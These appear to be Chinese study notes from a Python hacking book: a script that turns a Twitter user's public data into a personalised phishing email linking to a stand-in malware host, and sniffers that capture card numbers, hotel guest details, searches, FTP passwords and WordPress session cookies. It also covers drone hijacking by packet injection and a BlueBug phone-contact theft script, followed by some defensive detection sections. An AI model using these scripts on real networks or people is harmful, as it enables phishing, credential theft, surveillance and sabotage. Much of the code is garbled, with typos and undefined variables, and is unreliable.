脚本利用目标对象留在 Twitter 中可以公开访问的信息对他进行攻击。根据它会找到关于目标对象的地理位置信息、@过的用户、hash 标签以及链接，脚本就会生成和发送一个带有恶意链接的电子邮件，等待目标对象去点击。

import smtplib
import optparse
from email.mime.text import MIMEText
from twitterCLass import *
from random import choice
def send_main():
    pass
    
def main():
    parser = optparse.OptionParser("usage%prog -u -t -l  -p ")
    parser.add_option("-u", dest="handle", type="string", help="specify twitter handle")
    parser.add_option("-t", dest="tgt", type="string", help="specify target email")
    parser.add_option("-l", dest="user", type="string", help="specify gmail login")
    parser.add_option("-p", dest="pwd", type="string", help="speicfy gmail password")
    options, args = parser.parse_args()
    handle = options.handle
    tgt = options.tgt
    user = options.user
    pwd = options.pwd
    if handle == None or tgt == None or user == None or pwd == None:
        print(parser.usage)
        exit(-1)
    print("[+] Fetching tweets from: {}".format(handle))
    spam_tgt = ReconPerson(handle)
    spam_tgt.get_tweets()
    print("[+] Fetching interests from: {}".format(handle))
    interests = spam_tgt.find_interests()
    print("[+] Fetching location information from: {}".format(handle))
    location = spam_tgt.twitter_locate("mlb-cities.txt")
    spam_msg = "Dear {},".format(tgt)
    if location != None:
        rand_loc = choice(location)
        spam_msg += " Its me from {}.".format(rand_loc)
	if interests["users"] != None:
        rand_user = choice(interests["users"])
        spam_msg += " {} said to say hello.".format(rand_user)
    if interests["hashtags"] != None:
        rand_hash = choice(interests["hashtags"])
        spam_msg += " Did you see all the fuss about {}?".format(randHash)
	if interests["links"] != None:
        rand_link = choice(interests["links"])
        spam_msg += " I really liked your link to: {}.".format(rand_link)
	spam_msg += " Check out my link to http://evil.tgt/malware"
    print("[+] Sending Msg: {}".format(spam_msg))
    send_main(user, pwd, tgt, "Re: Important", spam_msg)

Wireless Network Attacks Using Python

2024-10-05T00:00:00+00:00

用 Python 进行无线网络攻击

搭建无线网络攻击环境

Backtrack 5 上的默认驱动程序能让用户把网卡设为混杂模式（monitor mode），并直接发送数据链路层上的帧。另外，它还有一个额外的无线插口，能让我们在网卡上再插上一个大功率天线。

混杂模式允许你直接拿到数据链路层上的无线网络数据帧，而不是以管理模式进入后获得的 802.11 以太网数据帧。这样，即使是在没有连上某个网络的情况下，也能看到 Beacons（信标）数据帧和无线网络管理数据帧的数据。

用 Scapy 测试无线网卡的嗅探功能

使用 aircrack-ng 工具包把网卡设为混杂模式。先用 Iwconif 列出无线网卡 wlan0 的相关信息。然后用 airmon-ng start wlan0 命令把网卡设为混杂模式

# iwconfig wlan0

把变量 conf.iface 设为新创建的嗅探用网卡，每监听到一个数据包，脚本就会运行 pkt_print 函数。如果这个数据包是 802.11 信标，802.11 探查响应、TCP 数据包、DNS 流量等

from scapy.all import *
def pkt_print(pkt):
    if pkt.haslayer(Dot11Beacon):
        print("[+] Detected 802.11 Beacon Frame")
    elif pkt.haslayer(Dot11ProbeReq):
        print("[+] Detected 802.11 Probe Request Frame")
    elif pkt.haslayer(TCP):
        print("[+] Detected a TCP Packet")
    elif pkt.haslayer(DNS):
        print("[+] Detected a DNS Packet")
        
conf.iface = "mon0"
sniff(prn=pkt_print)

安装 Python 蓝牙包

使用 Python 中集成的 Linux Bluez 应用程序编程接口（API）以及 obexftp API（ObexFTP 是一个基于 OBEX 协议的 FTP 客户端软件。OBEX 的全称为 Object Exchange-对象交换，所以称之为对象交换协议。）

# sudo apt-get install python-bluez bluetooth python-obexftp

另外还需要有一个蓝牙设备。大部分使用 Cambridge Silicon Radio（CSR）公司出品的芯片组的蓝牙设备都能在 Linux 系统下正常工作。可以使用 hciconfig config 命令把蓝牙设备的详细配置信息打印在屏幕上

Backtrack5 r1 上有一个小瑕疵——在这个已经编译好的内核中，没有可以用来直接发送数据链路层上的蓝牙数据包的内核模块。所以需要升级或者使用 Backtrack5 r2

绵羊墙-被动窃听无线网络中传输的秘密

使用 Python 正则表达式嗅探信用卡信息

最常用的三种信用卡：Visa、MasterCard 和 American Express，登录 http://www.regular-expressions.info/creditcard.html，其中会提供其他银行的信用卡卡号的正则表达式。

American Express 信用卡由 34 或者 37 开头的 15 位数字组成。

import re
def find_credit_card(raw):
    america_re = re.findall("3[47][0-9]{13}", raw)
    if america_re:
        print("[+] Found American Express Card: {}".format(america_re[0]))
        
def main():
    tests = []
    tests.append("I would like to buy 1337 copies of that dvd")
    tests.append("Bill my card: 378282246310005 for \$2600")
    for test in tests:
        fiind_credit_card(test)

类似地可以写出 MasterCards 和 Visa 信用卡卡号的正则表达式

def find_credit_card(pkt):
    raw = pkt.sprintf("%Raw.load%")
    america_re = re.findall("3[47][0-9]{13}", raw)
    master_re = re.findall("5[1-5][0-9]{14}", raw)
    visa_re = re.findall("4[0-9]{12}(?:[0-9]{3})?", raw)
    if america_re:
        print("[+] Found American Express Card: {}".format(america_re[0]))
    if master_re:
        print("[+] Found MasterCard Card: {}".format(master_re[0]))
    if visa_re:
        print("[+] Found Visa Card: {}".format(visa_re[0]))

嗅探宾馆住客

使用 Python 来截取酒店里其它住客的信息。

conf.iface = "mon0"
try:
	print("[*] Starting Hotel Guest Sniffer.")
    sniff(filter="tcp", prn=find_guest, store=0)
except KeyboardInterrupt:
    exit(0)

接下来构造正则表达式匹配所有以 LAST_NAME 开头，并以 & 结尾的字符串，这是宾馆住客房间号的正则表达式。

def find_guest(pkt):
    raw = pkt.sprintf("%Raw.load%")
    name = re.findall("(?i)Last_NAME=(.*)&", raw)
    room = re.findall("(?i)ROOM_NUMBER=(.*)'", raw)
    if name:
        print("[+] Found Hotel Guest {}, Room #".format(name[0], root[0]))

编写谷歌键盘记录器

在搜索栏里每输入一个字符时，浏览器几乎都会向谷歌发送一个 HTTP GET。

谷歌搜索的 URL 中的参数提供了大量附加信息，这些信息对编写谷歌键盘记录器是相当有用的。

参数	含义
q=	查询的内容，就是在搜索框里输入的内容
pq=	上一次查询的内容，即本次搜索前一次的查询内容
hl=	语言，默认是 en，可以试试 `xx-hacker`
as_epq=	查询的精度
as_filetype=	文件格式，用于搜索特定类型的文件，比如 `.zip`
as_sitesearch=	指定要搜索的网站

可以把抓取到的搜索数据实时显示出来

def find_google(pkt):
    if pkt.haslayer(Raw):
        payload = pkt.getlayer(Raw).load
        if "GET" in payload:
            if "google" in payload:
                r = re.findall(r"(?i)\&q=(.*?)\&", payload)
                if r:
                    search = r[0].split("&")[0]
                    search = search.replace("q=", "").replace("+", " ").replace("%20", " ")
                    print("[+] Searched For: {}".format(search))

通过 sniff 进行嗅探：sniff(filter="tcp port 80", prn=find_google)

嗅探 FTP 登陆口令

文件传输协议（FTP）中没有使用加密措施来保护用户的登录密码，通过正则寻找这一信息，同时也会把数据包中的目的 IP 地址提取出来

from scapy.all import *
def ftp_sniff(pkt):
    dest = pkt.getlayer(IP).dst
    raw = pkt.sprintf("%Raw.load%")
    user = re.findall("(?i)USER (.*)", raw)
    pswd = re.findall("(?i)PASS (.*)", raw)
    if user:
        print("[*] Detected FTP Login to {}".format(dest))
        print("[+] User account: {}".format(user[0]))
    elif pswd:
        print("[+] Password: {}".format(pswd[0]))

通过 sniff(filter="tcp port 21", prn=ftp_sniff) 实现

你带着笔记本电脑去过哪里？Python 告诉你

侦听 802.11 Probe 请求

为了提供一个无缝连接，你的电脑和手机里经常会有一个首选网络列表，其中含有你曾经成功连接过的网络名字。在你电脑启动后或者从某个网络断线掉下来的时候，电脑会发送 802.11 Probe 请求来搜索列表中的各个网络。

写一个工具来发现 802.11 Probe 请求

from scapy.all import *
interface = "mon0"
probe_reqs = []
def sniff_probe(p):
    if p.haslayer(Dot11ProbeReq):
        net_name = p.getlayer(Dot11ProbeReq).info
        if net_name not in probe_reqs:
            probe_reqs.append(net_name)
            print("[+] Detected New Probe Request: {}".format(net_name))
sniff(iface=interface, prn=sniff_probe)

寻找隐藏的 802.11 信标

尽管大部分网络都会公开显示他们的网络名（BSSID），但有的无线网络会使用一个隐藏的 SSID 来保护它的网络名不被发现。802.11 信标帧中的 info 字段一般都包含网络名。在隐藏的网络中，Wi-Fi 热点不会去填写这个字段，搜寻隐藏的网络其实很简单，因为只要去找 info 字段被留白的 802.11 信标帧就可以。

def sniff_dot11(p):
    if p.haslayer(Dot11Beacon):
        if p.getlayer(Dot11Beacon).info == "":
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hidden_nets:
                print("[-] Detected Hidden SSID: with MAC: {}".format(addr2))

找出隐藏的 802.11 网络的网络名

尽管热点没有填写 802.11 信标帧中的 info 字段，但它在 Probe 响应帧中还是要将网络名传输出来。因此必须等待那个与 802.11 信标帧的 Mac 地址匹配的 Probe 响应帧出现。

import sys
from scapy.all import *
interface = "mon0"
hidden_nets = []
unhidden_nets = []
def sniff_dot11(p):
    if p.haslayer(Dot11ProbeResp):
        addr2 = p.getlayer(Dot11).addr2
        if addr2 in hidden_nets and addr2 not in unhidden_nets:
            net_name = p.getlayer(Dot11ProbeResp).info
            print("[+] Decloaked Hidden SSID: {} for MAC: {}".format(net_name, addr2))
            unhidden_nets.append(addr2)
    if p.haslayer(Dot11Beacon):
        if p.getlayer(Dot11Beacon).info == "":
            addr2 = p.getlayer(Dot11).addr2
            if addr2 not in hidden_nets:
                print("[-] Detected Hidden SSID: with MAC: {}".format(addr2))
                hidden_nets.append(addr2)
sniff(iface=interface, prn=sniff_dot11)

用 Python 截取和监视无人机

截取数据包，解析协议

无人机和 iPhone 之间建立一个 ad-hoc 无线网络（点对点，ad-hoc 模式就和以前的直连双绞线概念一样，是 P2P 的连接，所以也就无法与其他网络进行沟通），MAC 地址绑定被证明是保护连接的唯一安全机制。只有配对成功的 iPhone 才能给无人机发送飞行控制指令。

首先，要将适配器调至混杂模式来监听流量。无人机发起了一个 UDP 流量，其目标地址是手机上的 UDP 5555 端口，发送的是视频信息，而飞行控制指令是通过 5556 端口实现的。

# airmon-ng start wlan0
# tcpdump-nn-i mon0

知道了 iPhone 是通过 UDP 5556 端口向无人机发送飞行控制指令之后，可以编写一个 Python 脚本来把飞行控制流量解析出来

from scapy.all import *
NAVPORT = 5556
def print_pkt(pkt):
    if pkt.haslayer(UDP) and pkt.getlayer(UDP).dport == NAVPORT:
        raw = pkt.sprintf("%Raw.load%")
        print(raw)
conf.iface = "mon0"
sinff(prn=print_pkt)

通过分析，协议使用的语法是 AT*CMD=SEQUENCE_NUMBER,VALUE,[VALUE{3}] 语句。

接下来写一个 interceptThread 类，其中存储了攻击所得的信息，包括当前抓取到的数据包、每条无人机协议的顺序号，以及一个描述无人机流量是否已经被拦截的布尔量。

class interceptThread(threading.Thread):
    def __init__(self):
        threading.Thread.__init__(self)
        self.cur_pkt = None
        self.seq = 0
        self.found_uav = False
   def run(self):
		sniff(prn=self.intercept_pkt, filter="udp port 5556")
   def intercept_pkt(self, pkt):
		if self.found_uav == False:
            print("[*] UAV Found.")
            self.found_uav = True
        self.cur_pkt = pkt
        raw = pkt.sprintf("%Raw.load%")
        try:
            self.seq = int(raw.split(",")[0].split("=")[-1]) + 5
        except:
            self.seq = 0

用 Scapy 制作 802.11 数据帧

接下来，要伪造一个包含无人机命令的数据包。要从当前的数据包或者帧中复制出必要的信息。这个数据包穿越了 RadioTap、802.11、SNAP、LLC、IP 和 UDP 层。

编写一个完整的库来复制各个层中的信息。注意，每个层中都要忽略掉一些字段，比如不复制表示 IP 包包长的字段，这个可以让 Scapy 自动把这个字段的值计算出来。同样，也不会记录那些存储校验和的字段。

from scapy.all import *
def dup_radio(pkt):
    r_pkt = pkt.getlayer(RadioTap)
    version = r_pkt.version
    pad = r_pkt.pad
    present = r_pkt.present
    notdecoded = r_pkt.notdecoded
    n_pkt = RadioTap(version=version, pad=pad, present=present, notdecoded=notdecoded)
	return n_pkt

def dup_dot11(pkt):
    subtype = d_pkt.subtype
    copy_type = d_pkt.type
    proto = d_pkt.proto
    fc_field = d_pkt.FCfield
    copy_id = d_pkt.ID
    addr1 = d_pkt.addr1
    addr2 = d_pkt.addr2
    addr3 = d_pkt.addr3
    sc = d_pkt.SC
    addr4 = d_pkt.addr4
    n_pkt = Dot11(subtype=subtype, type=copy_type, proto=proto, fc_field=...)
    return n_pkt

def dup_snap(pkt):
    s_pkt = pkt.getlayer(SNAP)
    oui = s_pkt.OUI
    code = s_pkt.code
    n_pkt = SNAP(OUI=oui, code=code)
    return n_pkt

def dup_llc(pkt):
	l_pkt = pkt.getlayer(LLC)
    dsap = l_pkt.dsap
    ssap = l_pkt.ssap
    ctrl = l_pkt.ctrl
    n_pkt = LLC(dsap=dsap, ssap=ssap, ctrl=ctrl)
    return n_pkt

def dup_ip(pkt):
    i_pkt = pkt.getlayer(IP)
    version = i_pkt.version
    tos = i_pkt.tos
    copy_id = i_pkt.id
    flags = i_pkt.flags
    ttl = i_pkt.ttl
    proto = i_pkt.proto
    src = i_pkt.src
    dst = i_pkt.dst
    options = i_pkt.options
    n_pkt = IP(version=version, id=copy_id, ...)
    return n_pkt

def dup_udp(pkt):
    u_pkt = pkt.getlayer(UDP)
    sport = u_pkt.sport
    dport = d_pkt.dport
    n_pkt = UDP(sport=sport, dport=dport)
    return n_pkt

接下来拼凑在一起：

def inject_cmd(self, cmd):
    radio = dup.dup_radio(self.cur_pkt)
    dot11 = dup.dup_dot11(self.cur_pkt)
    snap = dup.dup_snap(self.cur_pkt)
    llc = dup.dup_llc(self.cur_pkt)
    ip = dup.dup_ip(self.cur_pkt)
    udp = dup.dup_udp(self.cur_pkt)
    raw = Raw(load=cmd)
    inject_pkt = radio / dot11 / llc / snap / ip / udp / raw
    sendp(inject_pkt)

紧急迫降的指定对控制无人机来说是一条非常重要的指令。这个指令可以迫使无人机关闭引擎，并立即迫降下来。为了发出这条指令，可以使用序列号是当前的序列号再加上 100。接下来要发出指令 AT*COMWDG=$SEQ\r。这条指令的作用是把通信中的计数器重置成我们新设置的顺序值。之后无人机将会忽略之前的或者顺序号不匹配的指令。最后，再发送紧急迫降指令

完成攻击，使无人机紧急迫降

def emergency_land(self):
    spoof_seq = self.seq + 100
    watch = "AT*COMWDG={}\r".format(spoof_seq)
    to_cmd = "AT*REF={},{}\r".format(spoof_seq + 1, EMER)
    self.inject_cmd(watch)
    self.inject_cmd(to_cmd)
    
def take_off(self):
    spoof_seq = self.seq + 100
    watch = "AT*COMWDG={}\r".format(spoof_seq)
    to_cmd = "AT*REF={},{}\r".format(spoof_seq + 1, TAKEOFF)
    self.inject_cmd(watch)
    self.inject_cmd(to_cmd)

探测火绵羊

一款叫火绵羊（FireSheep）的工具，提供了一个简单的双击界面，可以远程接管 Facebook、Twitter、谷歌和其他大量社交媒介中毫无戒心的用户帐户。火绵羊工具会被动地监听无线网卡上由这些 Web 站点提供的 cookie。如果用户连接了不安全的无线网络，也没有使用诸如 HTTPS 之类的服务端控制措施来保护它的会话，火绵羊就会截获这些 cookie 供攻击者再次使用它们。

如果想截取特定会话中的 cookie，供重放的话，也有一个易用的接口方便编写定制的处理代码。下面这段处理代码是针对 Wordpress 的 Cookie 的

register({
  name: "Wordpress",
  matchPacket: function(packet) {
    for (varcookieName in packet.coookies) {
      if (cookieName.match0) {
        return true;
      }
    }
  },
  
  processPacket: function () {
    this.siteUrl += "wp-admin/"
    for (varcookieName in this.firstPacket.cookies) {
      if (cookieName.match(/^wordpress_[0-9a-fA-F]{32}$/)) {
        this.sessionId = this.firstPacket.cookies[cookieName];
        break;
      }
    }
  },
    
  identifyUser: function () {
    var resp = this.httpGet(this.siteUrl);
    this.userName = resp.body.querySelectorAll("#user_info a")[0].textContent;
    this.siteName = "Wordpress (" + this.firstPacket.host + ")";
  }
});

理解 WordPress 的会话 cookies

攻击者在火狐 3.6.24 上运行 Firesheep 工具包，可以发现一些类似的字符串通过无线网络以不加密的方式被发送出来。

编写一个 Python 脚本解析含有这些会话 cookie 的 Wordpress HTTP 会话。

import re
from scapy.all import *
def fire_catcher(pkt):
    raw = pkt.sprintf("%Raw.load%")
    r = re.findall("wordpress_[0-9a-fA-F]{32}", raw)
    if r and "Set" not in raw:
        print("{}>{} Cookie: {}".format(pkt.getlayer(IP).src, pkt.getlayer(IP).dst, r[0]))
conf.iface = "mon0"
sniff(filter="tcp port 80", prn=fire_catcher)

为了找出使用火绵羊的黑客，要确认的是攻击者在不同的 IP 地址上重复使用这些 cookie 值。为了检测出这一情况，要修改之前的脚本。

import re
import optparse
from scapy.all import *
cookie_table = {}
def fire_catcher(pkt):
    raw = pkt.sprintf("%Raw.load%")
    r = re.findall("wordpress_[0-9a-fA-F]{32}", raw)
    if r and "Set" not in raw:
        if r[0] not in cookie_table.keys():
            cookie_table[r[0]] = pkt.getlayer(IP).src
            print("[+] Detected and indexed cookie.")
        elif cookie_table[r[0]] != pkt.getlayer(IP).src:
            print("[*] Detected Conflict for {}".format(r[0]))
            print("Victim = {}".format(cookie_table[r[0]]))
            print("Attacker = {}".format(pkt.getlayer(IP).src))
            
def main():
    parser = optparse.OptionParser("usage %prog -i")
    parser.add_option("-i", dest="interface", type="string", help="specify interface to listen on")
    options, args = parser.parse_args()
    if options.interface == None:
        print(parser.usage)
        exit(-1)
    else:
        conf.iface = options.interface
    try:
        sniff(filter="tcp port 80", prn=fire_catcher)
    except KeyboardInterrupt:
        exit(0)

用 Python 搜寻蓝牙

为了能与蓝牙资源进行交互操作，需要 PyBluez 这个 Python 模块。该模块扩展了用于使用蓝牙资源的 Bluez 库的功能。注意，当调用 discover_devices() 之后就会把附近所有当前处于“可被发现”状态下的蓝牙设备的 MAC 地址放在一个列表中返回来。lookup_name() 可以将各个蓝牙设备的 MAC 地址转换成方便阅读的字符串。

from bluetooth import *
dev_list = discover_devices()
for device in dev_list:
    name = str(lookup_name(device))
    print("[+] Found Bluetooth Device {}".format(str(name)))
    print("[+] MAC address: {}".format(str(device)))

创建一个无限循环来检测：

import time
from bluetooth import *
already_found = list()
def find_devs():
    found_devs = discover_devices(lookup_names=True)
    for addr, name in found_devs:
        if addr not in already_found:
            print("[*] Found Bluetooth Device: {}".format(name))
            print("[+] MAC address: {}".format(addr))
            already_found.append(addr)
            
while True:
    find_devs()
    time.sleep(5)

截取无限流量，查找（隐藏的）蓝牙设备地址

在 iPhone 里，把无线网卡的 MAC 地址加 1，就得到了这台 iPhone 的蓝牙 MAC。由于 802.11 无线协议在第 2 层中没有使用能够保护 MAC 地址的措施，所以可以很方便地嗅探到它，然后使用该信息来计算蓝牙的 MAC 地址。

来设置一个嗅探无线网卡的 MAC 地址。注意，只要 MAC 地址的前三个十六进制数 MAC 地址的前三个八位字节的 MAC 地址。前三个十六进制数是一个 OUI（Organizational Unique Identifier，组织唯一标识符），它表示的是设备制造商，你可以查询 OUI 数据库获取进一步的信息。

from scapy.all import *
def wifi_print(pkt):
    iPhone_OUI = "d0:23:db"
    if pkt.haslayer(Dot11):
        wifi_mac = pkt.getlayer(Dot11).addr2
        if iPhone_OUI == wifi_mac[:8]:
            print("[*] Detected iPhone MAC: {}".format(wifi_mac))
conf.iface = "mon0"
sniff(prn=wifi_print)

有了 MAC 地址后，攻击者就可以发起一个设备名称查询来确认这个设备是否真的存在。即便是在“不可被发现”模式下，蓝牙设备仍会响应设备名称的查询请求。

def check_bluetooth(bt_addr):
    bt_name = lookup_name(bt_addr)
    if bt_name:
        print("[+] Detected Bluetooth Device: {}".format(bt_name))
    else:
        print("[-] Failed to Detect Bluetooth Device.")

扫描蓝牙 RFCOMM 信道

2004 年的 CeBIT 峰会上，H 和 L 演示了一个他们称为 BlueBug 的蓝牙漏洞（Herfurt，2004）。该漏洞针对的是蓝牙的 RFCOMM 传输协议。RFCOMM 通过蓝牙 L2CAP 协议模拟了 RS232 串行端口。从本质上讲，这会与另一台设备建立一个蓝牙连接，模拟一条普通的串行线缆，使用户能够（在另一台设备上）通过蓝牙打电话、发送短信、读取手机电话簿中的记录，以及转接电话或上网

虽然 RFCOMM 确实也能建立需要认证的加密连接，但厂商有时会忽略掉这一功能，允许（其他）未经认证的用户与设备建立连接。

下面将编写一个扫描器，找出允许未经认证建立 RFCOMM 通道的设备

from bluetooth import *
def rf_comm_con(addr, port):
    sock = BluetoothSocket(RFCOMM)
    try:
        sock.connect((addr, port)) 
		print("[+] RFCOMM Port {} open".format(port))
        sock.close()
    except Exception as e:
        print("[-] RFCOMM Port {} closed".format(port))
for port in range(1, 30):
    rf_comm_con("00:16:38:DE:AD:11", port)

通过这个脚本可以扫描出开放的 RFCOMM 端口，但不能判断这些端口提供的都是什么服务。需要使用蓝牙服务发现协议（Bluetooth Service Discovery Protocol）来实现

使用蓝牙服务发现协议

蓝牙服务发现协议（Service Discovery Protocol，SDP）提供了一种简便方法，用于描述和枚举蓝牙配置文件的类型以及设备提供的服务。设备的 SDP 配置文件中描述了运行在各个蓝牙协议和端口上的服务。

from bluetooth import *
def sdp_browse(addr):
    services = find_service(address=addr)
    for service in services:
        name = service["name"]
        proto = service["protocol"]
        port = str(service["port"])
        print("[+] Found {} on {}:{}".format(name, proto, port))
sdp_browse("00:16:38:DE:AD:11")

调用函数 find_service() 之后返回 record 数组，目标蓝牙设备上的每个服务都对应数组中的一个 record，每个 record 中记录了主机、名称、描述、提供者（provider）、协议、端口、服务类、配置文件和服务 ID。

对象交换（Object Exchange，OBEX）服务允许我们能像使用匿名 FTP 那样匿名地向一个系统中上传（push）和下载（pull）文件

用 Python ObexFTP 控制打印机

用 ObexFTP 连接到打印机并上传一个图像文件

import obexftp
try:
    bt_printer = obexftp.client(obexftp.BLUETOOTH)
    bt_printer.connect("00:16:38:DE:AD:11", 2)
    bt_printer.put_file("/tmp/ninja.jpg")
    print("[+] Printed Ninja Image.")
except:
    print("[-] Failed to print Ninja Image.")

用 Python 利用手机中的 BlueBug 漏洞

BlueBug 会与手机建立一个不需要经过认证的不安全连接，并通过这一连接窃取手机中的信息或直接向手机发送命令。这种攻击通过 RFCOMM 信道发送 AT 命令的方式，远程控制设备。这使得攻击者能读/发短信息、收集个人信息，或强制拨打电话号码。

import bluetooth
target_phone = "AA:BB:CC:DD:EE:FF"
port = 17
phone_sock = bluetooth.BluetoothSocket(bluetooth.RFCOMM)
phone_sock.connect((target_phone, port))
for contact in range(1, 5):
    at_cmd = "AT+CPBR={}\n".format(contact)
    phone_sock.send(at_cmd)
    result = client_sock.recv(1024)
    print("[+] {}: {}".format(contact, result))
sock.close()

Analyzing Network Traffic with Python

2024-09-10T00:00:00+00:00

用 Python 分析网络流量

IP 流量将何去何从？——用 Python 回答

把一个网际协议地址（IP 地址）和它所在的物理地址关联起来，可以用 MaxMind 公司提供的一个可以免费获取的开源数据库 GeoLiteCity。有了这个数据库，就可以把 IP 地址与对应的国家、邮政编码、国家名称以及常规经纬度坐标关联起来。

使用 PyGeoIP 关联 IP 地址和物理位置

Jennifer Ennis 编写了一个查询 GeoLiteCity 数据库的纯 Python 库——pygeoip。城市（city）、区域名称（region_name）、邮政编码（postal_code）、国名（country_name）、经纬度以及其他识别信息的记录

import pygeoip
gi = pygeoip.GeoIP("/opt/GetIP/Geo.dat")
def print_record(target):
    rec = gi.recory_by_name(target)
    city = rec["city"]
    region = rec["region_name"]
    country = rec["country_name"]
    long = rec["longitude"]
    lat = rec["latitude"]
    print("[*] Target: {} Geo-located.".format(target))
    print("[+] {}, {}, {}".format(city, region, country))
    print("[+] Latitude: {}, Longitude: {}".format(lat, long))
target = "173.255.226.98"
print_record(target)

使用 Dpkt 解析包

Dpkt 允许逐个分析抓包文件里的各个数据包，并检查数据包中的每个协议层。也可以使用 pypcap 分析当前的实时流量。

import dpkt
import socket
def print_pcap(pcap):
    for ts, buf in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            print("[+] Src: {} --> Dst: {}".format(src, dst))
        except:
            pass
        
def main():
    f = open("geotest.pcap")
    pcap = dpkt.pcap.Reader(f)
    print_pcap(pcap)

使用 Python 画谷歌地图

谷歌地图能在一个专门的界面中显示出一个虚拟地球仪、地图和地理信息。虽然用的是专用的界面，但谷歌地图可以让你很方便地在地球仪上画出指定位置或轨迹。通过创建一个扩展名为 KML 的文本文件，用户可以把许多个地理位置标在谷歌地球上。KML 是有特定规定的 XML 结构。

写一个函数 ret_KML 接收一个 IP，并返回表示该 IP 地址对应物理地址的 KML 结构

def ret_kml(ip):
    rec = gi.record_by_name(ip)
    try:
        longitude = rec["longitude"]
        latitude= rec["latitude"]
        kml = (
        	"\n"
            "%s\n"
            "\n"
            "%6f,%6f\n"
            "\n"
            "\n"
        ) % (ip, longitude, latitude)
        return kml
	except Exception as e:
        return ""

可能想要使用不同的图标来表示不同类型的网络流量，比如可以用源和目标 TCP 端口来区分不同的网络流量。可以查看谷歌 KML 文档。

“匿名者” 真能匿名吗？分析 LOIC 流量

LOIC（Low Orbit Ion Cannon，低轨道离子炮）是一个分布式拒绝服务工具包。

LOIC 使用大量的 UDP 和 TCP 流量对目标进行拒绝服务式攻击。

LOIC 提供两种操作模式。在第一种模式下，用户可以输入目标的地址。在第二种被称为 HIVEMIND（蜂群）的模式下，用户将 LOIC 连接到一台 IRC 服务器上，在这台服务器上，用户可以提出攻击，连接在这台服务器上的 IRC 的用户就会自动对该目标进行攻击

使用 Dkpt 发现下载 LOIC 的行为

编写一个 Python 脚本来解析 HTTP 流量，并检查其中有无通过 HTTP GET 获取压缩过的 LOIC 二进制可执行文件的情况。要做到这一点，需要再次使用 Dug Song 的 Dpkt 库。

import dpkt
import socket

def find_download(pcap):
    for ts, buf in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            tcp = ip.data
            http = dpkt.http.Request(tcp.data)
            if http.method == "GET":
                uri = http.uri.lower()
                if ".zip" in uri and "loic" in uri:
                    print("[!] {} Download LOIC.".format(src))
       except:
        pass
f = open()
pcap = dpkt.pcap.Reader(f)
find_download(pcap)

解析 Hive 服务器上的 IRC 命令

“匿名者” 成员需要登录到指定的 IRC 服务器上发出一条攻击指令，如 !lazor targetip=66.211.169.66 message=test_test port=80 method=tcp wait=false random=true start。任何把 LOIC 以 HIVEMIND 模式连上 IRC 服务器的“匿名者”成员都能立即开始攻击该目标。

在大多数情况下，IRC 服务器使用的是 TCP 6667 端口。发往 IRC 服务器的消息的目标 TCP 端口应该就是 6667。从 IRC 服务器那里发出消息的 TCP 源端口也应该是 6667。

import dpkt
import socket
def find_hivemind(pcap):
    for ts, buf in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            tcp = ip.data
            dport = tcp.dport
            sport = tcp.sport
            if dport == 6667:
                if "!lazor" in tcp.data.lower():
                    print("[!] DDoS Hivemind issued by: {}".format(src))
                    print("[+] Target CMD: {}".format(tcp.data))
            if sport == 6667:
                if "!lazor" in tcp.data.lower():
                    print("[!] DDoS Hivemind issued to: {}".format(src))
                    print("[+] Target CMD: {}".format(tcp.data))
		except:
            pass

实时监测 DDoS 攻击

若要识别攻击，需要设置一个不正常的数据包数量的阈值。如果某一用户发送某个地址的数据包的数量超过了这个阈值，就表明发生了我们需要把它视为攻击做进一步调查的事情。

import dpkt
import socket
THRESH = 10000
def find_attack(pcap):
    pkt_count = {}
    for ts, buf in pcap:
        try:
            eth = dpkt.ethernet.Ethernet(buf)
            ip = eth.data
            src = socket.inet_ntoa(ip.src)
            dst = socket.inet_ntoa(ip.dst)
            tcp = ip.data
            dport = tcp.dport
            if dport == 80:
                stream = "{}:{}".format(src, dst)
            	if pkt_count.has_key(stream):
                    pkt_count[stream] = pkt_count[stream] + 1
                else:
                    pkt_count[stream] = 1
		except:
            pass
        
for stream in pkt_count:
    pkts_sent = pkt_count[stream]
    if pkt_sent > THRESH:
        src = stream.split(":")[0]
        dst = stream.split(":")[1]
        print("[+] {} attacked {} with {} pkts."format(src, dst, str(pkts_sent)))

H.D.Moore 是如何解决五角大楼的麻烦的

一系列协调一致的老练的攻击：CIO Institude bulletin on computer security, 1999

检测出 Nmap 扫描十分容易，而且还可以查出攻击者的 IP 地址，并依次找出该 IP 的物理地址。但是，攻击者可以使用 nmap 的高级选项。他们扫描时在数据包中不必填入自己的地址，可以填入地球上其他许多不同地方的 IP 地址进行伪装扫描（decoy scan）

Moore 建议使用 TTL 字段分析所有来自 Nmap 扫描的数据包。IP 数据包的 TTL（time-to-live）字段可以用来确定在到达目的地之前数据包经过了几跳。每当一个数据包经过一个路由设备时，路由器会将 TTL 字段中的值减去一。Moore 意识到这是个确定扫描源的好方法。对每个被记录为 Nmap 扫描包的源地址来说，他都会发送一个 ICMP 数据包，去确定源地址和被扫描的机器之间隔了几跳。然后他就运用这些信息来辨认真正的扫描员。显然，只有来自真实的扫描源的包中的 TTL 正确的，伪造 IP 的包中的 TTL 值则应该是不正确的。Moore 将他的工具命名为 Nlog，因为它能记录 Nmap 扫描包中的许多信息。

理解 TTL 字段

IP 数据包的 TTL 字段。TTL 字段由 8 比特组成，可以有效记录 0 到 255 之间的值。当计算机发送一个 IP 数据包时，它将 TTL 字段设置为数据包在到达目的地址前所应经过的中继跳的上限值。数据包每经过一个路由设备，TTL 值就自减一。如果 TTL 值到了零，路由器就会丢弃该数据包，以防止无限路由循环。

当在 Nmap 1.6 中引入伪装扫描时，伪造数据包的 TTL 值既不是随机的，也不是经过精心计算的。正因为 TTL 值没有经过正确计算，Moore 才能够识别这些数据包。Nmap 运用以下算法随机化 TTL。该算法为平均约 48 个数据包生成一个随机的 TTL 值。用户也可以通过一个可选的参数把 TTL 设为一个固定值。

// 生存时间
if (ttl == -1){
  my_ttl = (get_random_uint() % 23) + 37;
} else {
  my_ttl = ttl;
}

